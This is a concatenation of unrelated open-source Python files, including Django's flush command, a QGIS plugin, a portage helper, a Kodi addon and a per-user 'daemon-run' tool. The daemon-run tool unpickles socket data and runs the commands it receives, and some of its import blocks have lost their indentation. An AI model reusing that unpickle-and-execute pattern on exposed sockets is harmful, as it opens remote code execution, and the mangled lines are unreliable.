        transformWGS84 = QgsCoordinateTransform(self.dGrType[grtype]["crs"], QgsCoordinateReferenceSystem("EPSG:4326"), QgsProject.instance())

        # Compute the number of steps to display within the progress bar and
        # get features from source
        total = 100.0 / source.featureCount() if source.featureCount() else 0
        features = source.getFeatures()

        for current, feature in enumerate(features):
            # Stop the algorithm if cancel button has been clicked
            if feedback.isCanceled():
                break

            # Add grid references in here — all references are derived from
            # the feature's centroid in the grid CRS.
            geom = feature.geometry()
            if transform is not None:
                geom.transform(transform)
            pt = geom.centroid().asPoint()

            # Add a feature in the sink (geometry kept in the source CRS).
            newFeature = QgsFeature()
            newFeature.setGeometry(feature.geometry())
            newFeature.setFields(fields)
            # Copy current field values
            for field in source.fields():
                newFeature[field.name()] = feature.attribute(field.name())
            # Generate new field values
            for p in precisions:
                if self.dPrecisions[p]["num"] > 0:
                    gr = self.osgr.grFromEN(pt.x(), pt.y(), self.dPrecisions[p]["num"], self.dGrType[grtype]["code"])
                    if gr == "na":
                        gr = ""
                    newFeature[prefix + self.dPrecisions[p]["field"]] = gr
                elif self.dPrecisions[p]["num"] < 0: #Easting/northing (-1) or Lat/lng (-2)
                    fieldName = self.dPrecisions[p]["field"].split(" ")
                    if self.dPrecisions[p]["num"] == -1:
                        x = int(pt.x())
                        y = int(pt.y())
                        fieldNameX = prefix + fieldName[0]
                        fieldNameY = prefix + fieldName[1]
                    else:
                        wgs84Point = transformWGS84.transform(pt)
                        x = wgs84Point.x()
                        y = wgs84Point.y()
                        # Deliberate swap: x (longitude) goes in the "Lng"
                        # column, y (latitude) in the "Lat" column.
                        fieldNameX = prefix + fieldName[1]
                        fieldNameY = prefix + fieldName[0]
                    newFeature[fieldNameX] = x
                    newFeature[fieldNameY] = y
            sink.addFeature(newFeature, QgsFeatureSink.FastInsert)

            # Update the progress bar
            feedback.setProgress(int(current * total))

        # Return the results of the algorithm. In this case our only result is
        # the feature sink which contains the processed features, but some
        # algorithms may return multiple feature sinks, calculated numeric
        # statistics, etc. These should all be included in the returned
        # dictionary, with keys matching the feature corresponding parameter
        # or output names.
        return {self.OUTPUT: dest_id}

    def name(self):
        """
        Returns the algorithm name, used for identifying the algorithm. This
        string should be fixed for the algorithm, and must not be localised.
        The name should be unique within each provider. Names should contain
        lowercase alphanumeric characters only and no spaces or other
        formatting characters.
        """
        return 'Add GRs to layers'

    def displayName(self):
        """
        Returns the translated algorithm name, which should be used for any
        user-visible display of the algorithm name.
        """
        return self.tr(self.name())

    def group(self):
        """
        Returns the name of the group this algorithm belongs to. This string
        should be localised.
        """
        return self.tr(self.groupId())

    def groupId(self):
        """
        Returns the unique ID of the group this algorithm belongs to. This
        string should be fixed for the algorithm, and must not be localised.
        The group id should be unique within each provider. Group id should
        contain lowercase alphanumeric characters only and no spaces or other
        formatting characters.
        """
        #return 'Grid references'
        return None

    def tr(self, string):
        # Standard Processing translation hook.
        return QCoreApplication.translate('Processing', string)

    def createInstance(self):
        # Processing framework factory method.
        return AddGridRefAlgorithm()
| burkmarr/QGIS-Biological-Recording-Tools | add_grid_ref_algorithm.py | Python | gpl-3.0 | 12,593 |
import sys
from optparse import make_option
from django.conf import settings
from django.db import connections, router, transaction, models, DEFAULT_DB_ALIAS
from django.core.management import call_command
from django.core.management.base import NoArgsCommand, CommandError
from django.core.management.color import no_style
from django.core.management.sql import sql_flush, emit_post_sync_signal
from django.utils.importlib import import_module
from django.utils.six.moves import input
from django.utils import six
class Command(NoArgsCommand):
    """Management command `flush`: empties all Django-managed tables and
    re-runs post-sync handlers and the initial_data fixture."""

    option_list = NoArgsCommand.option_list + (
        make_option('--noinput', action='store_false', dest='interactive', default=True,
            help='Tells Django to NOT prompt the user for input of any kind.'),
        make_option('--database', action='store', dest='database',
            default=DEFAULT_DB_ALIAS, help='Nominates a database to flush. '
                'Defaults to the "default" database.'),
        make_option('--no-initial-data', action='store_false', dest='load_initial_data', default=True,
            help='Tells Django not to load any initial data after database synchronization.'),
    )
    help = ('Returns the database to the state it was in immediately after '
           'syncdb was executed. This means that all data will be removed '
           'from the database, any post-synchronization handlers will be '
           're-executed, and the initial_data fixture will be re-installed.')

    def handle_noargs(self, **options):
        db = options.get('database')
        connection = connections[db]
        verbosity = int(options.get('verbosity'))
        interactive = options.get('interactive')
        # 'reset_sequences' is a stealth option
        reset_sequences = options.get('reset_sequences', True)

        self.style = no_style()

        # Import the 'management' module within each installed app, to register
        # dispatcher events.
        for app_name in settings.INSTALLED_APPS:
            try:
                import_module('.management', app_name)
            except ImportError:
                pass

        sql_list = sql_flush(self.style, connection, only_django=True, reset_sequences=reset_sequences)

        if interactive:
            confirm = input("""You have requested a flush of the database.
This will IRREVERSIBLY DESTROY all data currently in the %r database,
and return each table to the state it was in after syncdb.
Are you sure you want to do this?
Type 'yes' to continue, or 'no' to cancel: """ % connection.settings_dict['NAME'])
        else:
            confirm = 'yes'

        if confirm == 'yes':
            try:
                # Run all flush statements in a single transaction.
                with transaction.commit_on_success_unless_managed():
                    cursor = connection.cursor()
                    for sql in sql_list:
                        cursor.execute(sql)
            except Exception as e:
                new_msg = (
                    "Database %s couldn't be flushed. Possible reasons:\n"
                    "  * The database isn't running or isn't configured correctly.\n"
                    "  * At least one of the expected database tables doesn't exist.\n"
                    "  * The SQL was invalid.\n"
                    "Hint: Look at the output of 'django-admin.py sqlflush'. That's the SQL this command wasn't able to run.\n"
                    "The full error: %s") % (connection.settings_dict['NAME'], e)
                # Re-raise as CommandError while preserving the traceback.
                six.reraise(CommandError, CommandError(new_msg), sys.exc_info()[2])

            # Emit the post sync signal. This allows individual
            # applications to respond as if the database had been
            # sync'd from scratch.
            all_models = []
            for app in models.get_apps():
                all_models.extend([
                    m for m in models.get_models(app, include_auto_created=True)
                    if router.allow_syncdb(db, m)
                ])
            emit_post_sync_signal(set(all_models), verbosity, interactive, db)

            # Reinstall the initial_data fixture.
            if options.get('load_initial_data'):
                # Reinstall the initial_data fixture.
                call_command('loaddata', 'initial_data', **options)

        else:
            self.stdout.write("Flush cancelled.\n")
| postrational/django | django/core/management/commands/flush.py | Python | bsd-3-clause | 4,312 |
#!/usr/bin/env python
# coding: utf-8
#
# Copyright (c) 2019-2021, chys <admin@CHYS.INFO>
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions
# are met:
#
# Redistributions of source code must retain the above copyright notice, this
# list of conditions and the following disclaimer.
#
# Redistributions in binary form must reproduce the above copyright notice,
# this list of conditions and the following disclaimer in the documentation
# and/or other materials provided with the distribution.
#
# Neither the name of chys <admin@CHYS.INFO> nor the names of other
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
# ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE
# LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
# CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF
# SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
# INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
# CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
# ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
# POSSIBILITY OF SUCH DAMAGE.
#
from __future__ import print_function
import os
import pprint
import pwd
import socket
import stat
import sys
import subprocess
import threading
import time
try:
import Queue as queue
except ImportError:
import queue
try:
import cPickle as pickle
except ImportError:
import pickle
try:
FileNotFoundError
except NameError:
FileNotFoundError = OSError
def get_socket_path():
    """Return the per-user rendezvous socket path.

    On Linux a leading NUL byte selects the abstract socket namespace,
    so no filesystem entry is created.
    """
    username = pwd.getpwuid(os.getuid()).pw_name
    path = '/tmp/daemon-run-{}'.format(username)
    if sys.platform.startswith('linux'):
        return '\0' + path
    return path
def colorize(*args, **kwargs):
    """Print *args* prefixed with a timestamp and wrapped in the ANSI
    color given by the required ``color`` keyword (e.g. ``'32'``).
    Remaining keyword arguments are forwarded to ``print``."""
    color = kwargs.pop('color')
    tail = kwargs.pop('end', '\n')
    stamp = time.strftime('%Y-%m-%d %H:%M:%S')
    print('[{}] \033[{}m'.format(stamp, color), end='')
    # Reset the color before whatever line ending the caller asked for.
    kwargs['end'] = '\033[0m' + tail
    print(*args, **kwargs)
def info(*args, **kwargs):
    # Green: informational / progress messages.
    colorize(*args, color='32', **kwargs)


def error(*args, **kwargs):
    # Bold red: failures.
    colorize(*args, color='31;1', **kwargs)
# Currently running child process (or None).  daemon_handle() reads this to
# implement the --kill request.
current_proc = None


def executor(q):
    """Worker loop: pull request dicts off *q* and run them one at a time.

    Each request carries 'cmd' (argv list), 'pwd' (working directory) and
    optionally 'environ' (extra environment variables).  A ``None`` item
    shuts the loop down.
    """
    global current_proc
    while True:
        req = q.get()
        if req is None:
            break
        info('Handling request: {}'.format(pprint.pformat(req)))
        try:
            # Environment preparation now lives inside the try block: the
            # original dereferenced req.get('environ') *before* checking it
            # for None, so a request without 'environ' (or without 'pwd')
            # raised TypeError/KeyError outside the handler and killed the
            # worker thread.
            env = os.environ.copy()
            new_env = req.get('environ') or {}
            new_env['PWD'] = req['pwd']
            env.update(new_env)
            current_proc = subprocess.Popen(req['cmd'], cwd=req['pwd'], env=env)
            ret = current_proc.wait()
        except (KeyError, TypeError, ValueError, OSError) as e:
            error('Failed to execute command {}: {}'.format(
                pprint.pformat(req), str(e)))
        else:
            info('Done with request: {} ret code: {}'.format(
                pprint.pformat(req), ret), end='\n'*5)
        finally:
            current_proc = None
def daemon_handle(q, conn):
    """Receive one pickled request on *conn*, ack it, and either enqueue it
    on *q* for the executor or handle the special --kill command inline.

    NOTE(review): the payload is unpickled as-is; this is only safe because
    the socket is a per-user Unix-domain socket — do not expose it further.
    """
    try:
        conn.settimeout(2)
        # MSG_WAITALL: keep reading until the peer shuts down its side.
        req_s = conn.recv(16384, socket.MSG_WAITALL)
        info('Received {} bytes'.format(len(req_s)))
        try:
            req = pickle.loads(req_s)
        except (pickle.UnpicklingError, ValueError, TypeError) as e:
            error(str(e))
            conn.send(b'Failed to unpickle message')
            return
        conn.send(b'OK')
    except socket.error as e:
        error(str(e))
        return
    finally:
        # Always close the client connection, success or not.
        conn.close()
    info('Parsed request: {}'.format(pprint.pformat(req)))
    cmd = req.get('cmd', ())
    if cmd and cmd[0] == '--kill':
        proc = current_proc
        if proc:
            # Try SIGTERM for up to ~2 seconds (20 x 0.1s); the for/else
            # falls through to SIGKILL if the process never exits.
            for i in range(20):
                if proc.poll() is not None:
                    break
                else:
                    proc.terminate()
                    info('Sent SIGTERM to current process')
                    time.sleep(0.1)
            else:
                proc.kill()
                info('Sent SIGKILL to current process')
        else:
            error('No current process to kill')
    else:
        q.put(req)
def daemon():
    """Run the server: listen on the per-user Unix socket and feed incoming
    requests to the executor thread until interrupted."""
    path = get_socket_path()
    # For a filesystem (non-abstract) socket, remove any stale entry first.
    if not path.startswith('\0'):
        try:
            os.unlink(path)
        except FileNotFoundError:
            pass
    s = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)
    s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    s.bind(path)
    s.listen(5)
    info('Listing on Unix-domain socket', s.getsockname())
    q = queue.Queue()
    th = threading.Thread(target=executor, args=(q,))
    th.start()
    try:
        while True:
            conn, addr = s.accept()
            info('Accepted new connection', addr)
            daemon_handle(q, conn)
    except KeyboardInterrupt:
        import signal
        # Conventional exit status for "killed by SIGINT".
        sys.exit(128 + signal.SIGINT)
    finally:
        # A None sentinel tells the executor loop to stop.
        q.put(None)
        th.join()
def get_cwd():
    """Return the working directory, preferring the logical $PWD (which may
    keep symlinked path components) when it refers to the same directory as
    the physical os.getcwd()."""
    logical = os.environ.get('PWD')
    physical = os.getcwd()
    if not logical:
        return physical
    try:
        st_logical = os.stat(logical)
    except (IOError, OSError):
        return physical
    try:
        st_physical = os.stat(physical)
    except (IOError, OSError):
        return logical
    # Same directory (stat results compare equal) -> keep the logical path.
    if stat.S_ISDIR(st_logical.st_mode) and st_logical == st_physical:
        return logical
    return physical
def select_environ():
    """Return the subset of the caller's environment worth forwarding to
    the daemon (currently just PATH)."""
    return {key: os.environ[key]
            for key in ('PATH',) if key in os.environ}
def usage():
    """Print a short usage summary for client mode."""
    prog = sys.argv[0]
    print('{}: Starts a daemon'.format(prog))
    print('{} [-C <WORKING_DIRECTORY>] CMD [ARGS...]'.format(prog))
def client():
    """Send the command line (after an optional -C <dir>) to the daemon."""
    if sys.argv[1] == '--help':
        usage()
        return
    pwd = None
    args = sys.argv[1:]
    # Consume leading "-C <dir>" pairs; everything after is the command.
    while args:
        if args[0] == '-C' and len(args) >= 2:
            pwd = os.path.realpath(args[1])
            del args[:2]
        else:
            break
    path = get_socket_path()
    s = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)
    s.connect(path)
    msg = {
        'pwd': pwd or get_cwd(),
        'cmd': args,
        'environ': select_environ(),
    }
    info(pprint.pformat(msg))
    # Force version 2 so that Python 2 and 3 can be used interchangeably
    s.send(pickle.dumps(msg, 2))
    # Half-close so the daemon's MSG_WAITALL recv sees end-of-message.
    s.shutdown(socket.SHUT_WR)
    info('RECEIVED FROM DAEMON:', s.recv(4096))
def main():
    # No arguments: run as the daemon; otherwise act as a client.
    if len(sys.argv) < 2:
        daemon()
    else:
        client()


if __name__ == '__main__':
    main()
| chys87/scripts | daemon-run.py | Python | bsd-3-clause | 6,814 |
# -*- coding: utf-8 -*-
"""The tg2 package"""
| fedora-infra/fedmsg_middleware | examples/tg2/tg2/__init__.py | Python | lgpl-2.1 | 46 |
# Copyright 2010-2012 Gentoo Foundation
# Distributed under the terms of the GNU General Public License v2
import tempfile
from portage import os
from portage import shutil
from portage.const import EBUILD_PHASES
from portage.elog import elog_process
from portage.package.ebuild.config import config
from portage.package.ebuild.doebuild import doebuild_environment
from portage.package.ebuild.prepare_build_dirs import prepare_build_dirs
from portage.util._async.SchedulerInterface import SchedulerInterface
from portage.util._eventloop.EventLoop import EventLoop
from _emerge.EbuildPhase import EbuildPhase
def spawn_nofetch(portdb, ebuild_path, settings=None):
    """
    This spawns pkg_nofetch if appropriate. The settings parameter
    is useful only if setcpv has already been called in order
    to cache metadata. It will be cloned internally, in order to
    prevent any changes from interfering with the calling code.
    If settings is None then a suitable config instance will be
    acquired from the given portdbapi instance. Do not use the
    settings parameter unless setcpv has been called on the given
    instance, since otherwise it's possible to trigger issues like
    bug #408817 due to fragile assumptions involving the config
    state inside doebuild_environment().

    A private PORTAGE_BUILDDIR will be created and cleaned up, in
    order to avoid any interference with any other processes.
    If PORTAGE_TMPDIR is writable, that will be used, otherwise
    the default directory for the tempfile module will be used.

    We only call the pkg_nofetch phase if either RESTRICT=fetch
    is set or the package has explicitly overridden the default
    pkg_nofetch implementation. This allows specialized messages
    to be displayed for problematic packages even though they do
    not set RESTRICT=fetch (bug #336499).

    This function does nothing if the PORTAGE_PARALLEL_FETCHONLY
    variable is set in the config instance.
    """
    # Always work on a clone so the caller's config is never mutated.
    if settings is None:
        settings = config(clone=portdb.settings)
    else:
        settings = config(clone=settings)

    if 'PORTAGE_PARALLEL_FETCHONLY' in settings:
        return

    # We must create our private PORTAGE_TMPDIR before calling
    # doebuild_environment(), since lots of variables such
    # as PORTAGE_BUILDDIR refer to paths inside PORTAGE_TMPDIR.
    portage_tmpdir = settings.get('PORTAGE_TMPDIR')
    if not portage_tmpdir or not os.access(portage_tmpdir, os.W_OK):
        portage_tmpdir = None
    private_tmpdir = tempfile.mkdtemp(dir=portage_tmpdir)
    settings['PORTAGE_TMPDIR'] = private_tmpdir
    settings.backup_changes('PORTAGE_TMPDIR')
    # private temp dir was just created, so it's not locked yet
    settings.pop('PORTAGE_BUILDIR_LOCKED', None)

    try:
        doebuild_environment(ebuild_path, 'nofetch',
            settings=settings, db=portdb)
        restrict = settings['PORTAGE_RESTRICT'].split()
        defined_phases = settings['DEFINED_PHASES'].split()
        if not defined_phases:
            # When DEFINED_PHASES is undefined, assume all
            # phases are defined.
            defined_phases = EBUILD_PHASES

        # Skip unless fetch is restricted or pkg_nofetch is overridden
        # (see docstring / bug #336499).
        if 'fetch' not in restrict and \
            'nofetch' not in defined_phases:
            return

        prepare_build_dirs(settings=settings)
        ebuild_phase = EbuildPhase(background=False,
            phase='nofetch',
            scheduler=SchedulerInterface(EventLoop(main=False)),
            settings=settings)
        ebuild_phase.start()
        ebuild_phase.wait()
        elog_process(settings.mycpv, settings)
    finally:
        # Clean up the private tmpdir even if a phase failed.
        shutil.rmtree(private_tmpdir)
| clickbeetle/portage-cb | pym/portage/package/ebuild/_spawn_nofetch.py | Python | gpl-2.0 | 3,357 |
#!/usr/bin/env python
r"""Script for computing the error due to a non-well-balanced method"""
import os
import numpy
import clawpack.pyclaw.solution as solution
# Parameters
sea_level = 0.0
def compute_error(q, aux, eta, rho, norm=1):
    r"""Compute steady-state errors for a two-layer shallow-water solution.

    :param q: Solution array of shape (4, num_cells), rows ordered as
        (h_top, hu_top, h_bottom, hu_bottom); depths are scaled by density.
    :param aux: Aux array whose first row ``aux[0, :]`` is the bathymetry.
    :param eta: Pair of expected steady surface elevations (top, internal).
    :param rho: Pair of layer densities (top, bottom).
    :param norm: Order of the norm handed to ``numpy.linalg.norm``.
    :returns: Array of 6 values: for each layer the (h, hu, eta) error norms.
    """
    num_cells = q.shape[1]

    # Build the true steady-state solution from the target surfaces eta,
    # assuming the top layer is never dry.
    h_true = numpy.empty((2, num_cells))
    hu_true = numpy.zeros((2, num_cells))   # steady state => zero momentum
    eta_true = numpy.zeros((2, num_cells))

    # Bottom layer depth: internal surface minus bathymetry, floored at zero
    # so that dry cells end up with zero depth.
    h_compare = numpy.zeros((2, num_cells))
    h_compare[0, :] = numpy.ones(num_cells) * eta[1] - aux[0, :]
    h_true[1, :] = numpy.max(h_compare, axis=0)
    eta_true[0, :] = numpy.zeros(num_cells)
    eta_true[1, :] = h_true[1, :] + aux[0, :]

    # Scale depths by density to match the stored conserved quantities.
    h_true[0, :] = (numpy.ones(num_cells) * eta[0]
                    - (h_true[1, :] + aux[0, :])) * rho[0]
    h_true[1, :] = h_true[1, :] * rho[1]

    # Unpack the computed solution: q rows are (h0, hu0, h1, hu1).
    h = [q[0, ...], q[2, ...]]
    hu = [q[1, ...], q[3, ...]]
    eta_comp = [h[0] / rho[0] + h[1] / rho[1] + aux[0, ...],
                h[1] / rho[1] + aux[0, ...]]

    layers = 2
    error = numpy.empty(3 * layers)
    # range (not the Python-2-only xrange) keeps this helper portable.
    for i in range(layers):
        error[3 * i] = numpy.linalg.norm(h[i] - h_true[i, :], ord=norm)
        error[3 * i + 1] = numpy.linalg.norm(hu[i] - hu_true[i, :], ord=norm)
        error[3 * i + 2] = numpy.linalg.norm(eta_comp[i] - eta_true[i, :], ord=norm)

    return error
def sig_fig_round(x, figs=1):
    """Round each entry of *x* to *figs* significant figures.

    :param x: Sequence of numbers; zeros are passed through unchanged.
    :param figs: Number of significant figures to keep.
    :returns: New list of floats rounded to *figs* significant figures.
    """
    rounded = []
    for value in x:
        if value != 0.0:
            # Position of the leading digit; abs() keeps log10 defined for
            # negative values (the original formula produced NaN for them).
            exponent = int(numpy.floor(numpy.log10(numpy.abs(value))))
            value = numpy.round(value, -exponent + (figs - 1))
        rounded.append(value)
    # Truncate residual digits via %g formatting.
    raw_string = r"%." + str(figs) + "g"
    return [float(raw_string % value) for value in rounded]
if __name__ == '__main__':
    # Construct path to solutions; DATA_PATH must point at the directory
    # containing the well-balancing run outputs.
    data_path = os.environ["DATA_PATH"]
    eigen_method = 2
    rho = [0.98, 1.0]  # layer densities (top, bottom)
    for test in ['smooth','jump']:
        for dry in [True, False]:
            # Output directory for this (bathymetry, dry-state) combination.
            sol_path = os.path.join(data_path,"well_balancing_%s" % test,
                            "ml_e%s_d%s_output" % (eigen_method, dry))
            sol = solution.Solution(1, path=sol_path, read_aux=True)
            # Expected steady surfaces: internal surface -6.0 produces dry
            # cells against the bathymetry, -4.0 stays wet everywhere.
            if dry:
                eta = [0.0, -6.0]
            else:
                eta = [0.0, -4.0]
            # Python 2 print statements (script predates Python 3).
            print "%s, %s =" % (test, dry)
            print "  ",sig_fig_round(compute_error(sol.q, sol.aux, eta, rho, norm=1),figs=3)
print " ",sig_fig_round(compute_error(sol.q, sol.aux, eta, rho, norm=numpy.inf),figs=3) | mandli/multilayer-examples | 1d/well_balancing_comparison.py | Python | mit | 2,579 |
"""
Pipeline steps for Third Party Auth to support tahoe-auth0 package.
"""
import logging
import beeline
import tahoe_sites.api
from . import course_roles
TAHOE_AUTH0_BACKEND_NAME = 'tahoe-auth0'
log = logging.getLogger(__name__)
@beeline.traced(name='tpa_pipeline.set_roles_from_auth0_roles')
def set_roles_from_auth0_roles(auth_entry, strategy, details, user=None, *args, **kwargs):
    """
    Sync the user's `is_admin` status and OrgStaffRole from `tahoe-auth0` details.

    This pipeline step bridges the `tahoe-auth0` and `tahoe-sites` packages;
    although unlikely, changes to either package may break it.
    """
    request = strategy.request
    current_backend = request.backend.name
    beeline.add_context_field('backend_name', current_backend)
    beeline.add_context_field('pipeline_details', details)

    # Only act for the tahoe-auth0 backend and when a user already exists.
    if not user or current_backend != TAHOE_AUTH0_BACKEND_NAME:
        return

    admin_flag = details['auth0_is_organization_admin']
    staff_flag = details['auth0_is_organization_staff']

    organization = tahoe_sites.api.get_current_organization(request)
    short_name = organization.short_name
    beeline.add_context_field('organization_short_name', short_name)

    tahoe_sites.api.update_admin_role_in_organization(
        user=user,
        organization=organization,
        set_as_admin=admin_flag,
    )
    course_roles.update_organization_staff_roles(
        user=user,
        organization_short_name=short_name,
        set_as_organization_staff=staff_flag,
    )
| appsembler/edx-platform | openedx/core/djangoapps/appsembler/auth/tahoe_auth0_pipeline.py | Python | agpl-3.0 | 1,624 |
# -*- coding: utf-8 -*-
#------------------------------------------------------------
# beta.1 Dailymotion
# Version 0.1 (10.12.2014)
#------------------------------------------------------------
# License: GPL (http://www.gnu.org/licenses/gpl-3.0.html)
# Gracias a la librería plugintools de Jesús (www.mimediacenter.info)
import os
import sys
import urllib
import urllib2
import re
import shutil
import zipfile
import time
import xbmc
import xbmcgui
import xbmcaddon
import xbmcplugin
import plugintools
import json
import math
home = xbmc.translatePath(os.path.join('special://home/addons/plugin.video.arena+/', ''))
tools = xbmc.translatePath(os.path.join('special://home/addons/plugin.video.arena+/resources/tools', ''))
addons = xbmc.translatePath(os.path.join('special://home/addons/', ''))
resources = xbmc.translatePath(os.path.join('special://home/addons/plugin.video.arena+/resources', ''))
art = xbmc.translatePath(os.path.join('special://home/addons/plugin.video.arena+/art', ''))
tmp = xbmc.translatePath(os.path.join('special://home/addons/plugin.video.arena+/tmp', ''))
playlists = xbmc.translatePath(os.path.join('special://home/addons/playlists', ''))
icon = art + 'icon.png'
fanart = 'fanart.jpg'
def dailym_getplaylist(url):
    """Return the id of the first playlist entry found in a Dailymotion feed.

    :param url: Dailymotion API URL listing a user's playlists.
    :returns: The first playlist id found, or None when the feed has none.
    """
    plugintools.log("beta.1.dailymotion_playlists "+url)

    # Fetch playlist list from Dailymotion playlist user
    data = plugintools.read(url)

    # Extract items from feed; each item is a {...} JSON fragment.
    matches = plugintools.find_multiple_matches(data,'{"(.*?)}')
    for entry in matches:
        plugintools.log("entry="+entry)
        title = plugintools.find_single_match(entry,'name":"(.*?)"')
        # Replace literal \uXXXX escape text for common French accents.
        title = title.replace("\u00e9" , "é")
        title = title.replace("\u00e8" , "è")
        title = title.replace("\u00ea" , "ê")
        title = title.replace("\u00e0" , "à")
        plugintools.log("title= "+title)
        id_playlist = plugintools.find_single_match(entry,'id":"(.*?)",')
        if id_playlist:
            plugintools.log("id_playlist= "+id_playlist)
            return id_playlist
    # Robustness fix: explicit result when no entry carries an id
    # (previously an empty feed could raise NameError on the return).
    return None
def dailym_getvideo(url):
    """Return the id of the first video found in a Dailymotion feed.

    :param url: Dailymotion API URL listing videos.
    :returns: The first video id found, or None when the feed has none.
    """
    plugintools.log("beta.1.dailymotion_videos "+url)

    # Fetch video list from Dailymotion feed
    data = plugintools.read(url)

    # Extract items from feed; each item is a {...} JSON fragment.
    matches = plugintools.find_multiple_matches(data,'{"(.*?)}')
    for entry in matches:
        plugintools.log("entry= "+entry)
        # Not the better way to parse XML, but clean and easy
        title = plugintools.find_single_match(entry,'title":"(.*?)"')
        title = title.replace("\u00e9" , "é")
        title = title.replace("\u00e8" , "è")
        title = title.replace("\u00ea" , "ê")
        title = title.replace("\u00e0" , "à")
        video_id = plugintools.find_single_match(entry,'id":"(.*?)",')
        if video_id:
            plugintools.log("video_id= "+video_id)
            return video_id
    # Robustness fix: explicit result when no entry carries an id
    # (previously an empty feed could raise NameError on the return).
    return None
def dailym_pl(params):
    """List the videos of a Dailymotion playlist as playable Kodi items."""
    plugintools.log("dailym_pl "+repr(params))
    pl = params.get("url")
    # Fetch the playlist feed and split it into per-video JSON fragments.
    data = plugintools.read(pl)
    plugintools.log("playlist= "+data)
    dailym_vid = plugintools.find_multiple_matches(data, '{(.*?)}')
    for entry in dailym_vid:
        plugintools.log("entry= "+entry)
        title = plugintools.find_single_match(entry, '"title":"(.*?)",')
        title = title.replace('"', "")
        title = title.replace('\*', "")
        video_id = plugintools.find_single_match(entry, '"id":"(.*?)",')
        thumbnail = "https://api.dailymotion.com/thumbnail/video/"+video_id+""
        # NOTE(review): this fallback can never trigger -- thumbnail always
        # starts with the URL prefix above, so it is never an empty string.
        if thumbnail == "":
            thumbnail = 'http://image-parcours.copainsdavant.com/image/750/1925508253/4094834.jpg'
        # Hand playback off to the dailymotion addon via a plugin:// URL.
        url = "plugin://plugin.video.dailymotion_com/?url="+video_id+"&mode=playVideo"
        print 'url',url
        plugintools.add_item(action="play", title=title, url=url, folder = False, fanart='http://image-parcours.copainsdavant.com/image/750/1925508253/4094834.jpg',thumbnail=thumbnail,isPlayable = True)
| iptvgratis/TUPLAY | resources/tools/dailymotion.py | Python | gpl-3.0 | 4,151 |
"""
Menu utilities.
"""
import types
from django.conf import settings
from django.core.exceptions import ImproperlyConfigured
from django.utils.importlib import import_module
from django.core.urlresolvers import reverse
def _get_menu_cls(menu_cls, context):
    """Resolve *menu_cls* to a Menu class.

    ``menu_cls`` is either a dotted-path string ("pkg.module.Class") or a
    dict mapping dotted AdminSite instance paths to dotted menu paths; in
    the dict case the menu whose admin site URL prefixes the current
    request path wins.

    :raises ValueError: when a dict lookup matches no admin site.
    """
    # Exact type check kept from the original (was `types.DictType`, which
    # is Python-2-only; `dict` works on both 2 and 3).
    if type(menu_cls) is dict:
        curr_url = context.get('request').META['PATH_INFO']
        for key in menu_cls:
            admin_site_mod, admin_site_inst = key.rsplit('.', 1)
            admin_site_mod = import_module(admin_site_mod)
            admin_site = getattr(admin_site_mod, admin_site_inst)
            admin_url = reverse('%s:index' % admin_site.name) # FIXME use current_app to reverse custom AdminSite!
            if curr_url.startswith(admin_url):
                mod, inst = menu_cls[key].rsplit('.', 1)
                mod = import_module(mod)
                return getattr(mod, inst)
    else:
        mod, inst = menu_cls.rsplit('.', 1)
        mod = import_module(mod)
        return getattr(mod, inst)
    raise ValueError('Dashboard menu matching "%s" not found' % menu_cls)
def get_admin_menu(context):
    """
    Return an instance of the menu configured via the ``ADMIN_TOOLS_MENU``
    setting, falling back to the default menu when the setting is absent.
    """
    menu_cls = getattr(settings, 'ADMIN_TOOLS_MENU',
                       'admin_tools.menu.DefaultMenu')
    return _get_menu_cls(menu_cls, context)()
| liberation/django-admin-tools | admin_tools/menu/utils.py | Python | mit | 1,331 |
from bravado_core.spec import Spec
import mock
from pyramid.config import Configurator
from pyramid.registry import Registry
import pytest
from swagger_spec_validator.common import SwaggerValidationError
import pyramid_swagger
from pyramid_swagger.model import SwaggerSchema
@mock.patch('pyramid_swagger.register_api_doc_endpoints')
@mock.patch('pyramid_swagger.get_swagger_schema')
@mock.patch('pyramid_swagger.get_swagger_spec')
def test_disable_api_doc_views(_1, _2, mock_register):
    # When api-doc views are disabled, includeme() must not register the
    # api-doc endpoints.
    settings = {
        'pyramid_swagger.enable_api_doc_views': False,
        'pyramid_swagger.enable_swagger_spec_validation': False,
    }

    mock_config = mock.Mock(
        spec=Configurator,
        registry=mock.Mock(spec=Registry, settings=settings))

    pyramid_swagger.includeme(mock_config)
    assert not mock_register.called


def test_bad_schema_validated_on_include():
    # An invalid schema must fail fast during includeme() when spec
    # validation is enabled.
    settings = {
        'pyramid_swagger.schema_directory': 'tests/sample_schemas/bad_app/',
        'pyramid_swagger.enable_swagger_spec_validation': True,
    }
    mock_config = mock.Mock(registry=mock.Mock(settings=settings))
    with pytest.raises(SwaggerValidationError):
        pyramid_swagger.includeme(mock_config)
    # TODO: Figure out why this assertion fails on travis
    # assert "'info' is a required property" in str(excinfo.value)


@mock.patch('pyramid_swagger.get_swagger_spec')
def test_bad_schema_not_validated_if_spec_validation_is_disabled(_):
    # With validation disabled, a bad schema must not raise on include.
    settings = {
        'pyramid_swagger.schema_directory': 'tests/sample_schemas/bad_app/',
        'pyramid_swagger.enable_swagger_spec_validation': False,
    }
    mock_config = mock.Mock(
        spec=Configurator, registry=mock.Mock(settings=settings))
    pyramid_swagger.includeme(mock_config)


